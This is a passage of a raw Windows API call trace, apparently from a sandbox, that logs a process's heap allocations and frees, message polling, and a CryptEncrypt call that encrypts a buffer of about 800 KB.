0x2e54ed8 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0180.615] CharLowerBuffW (in: lpsz="byte[802920]", cchLength=0xc | out: lpsz="byte[802920]") returned 0xc [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0180.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0180.627] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0180.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0180.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0180.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0180.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0180.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0180.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0180.713] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0180.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0180.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0180.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0180.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0180.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0180.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0180.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0180.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0180.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0180.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0180.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0180.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0180.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0180.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0180.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0180.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0x11bd020 [0180.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x11bd020 | out: hHeap=0x970000) returned 1 [0180.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0180.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0180.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0180.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0180.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0180.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0180.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0180.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0180.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0180.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0180.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c80 [0180.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.798] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54468 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0180.799] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10dd020*, pdwDataLen=0x8cef60*=0xc4066, dwBufLen=0xc4068 | out: pbData=0x10dd020*, pdwDataLen=0x8cef60*=0xc4068) returned 1 [0180.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.899] RtlAllocateHeap 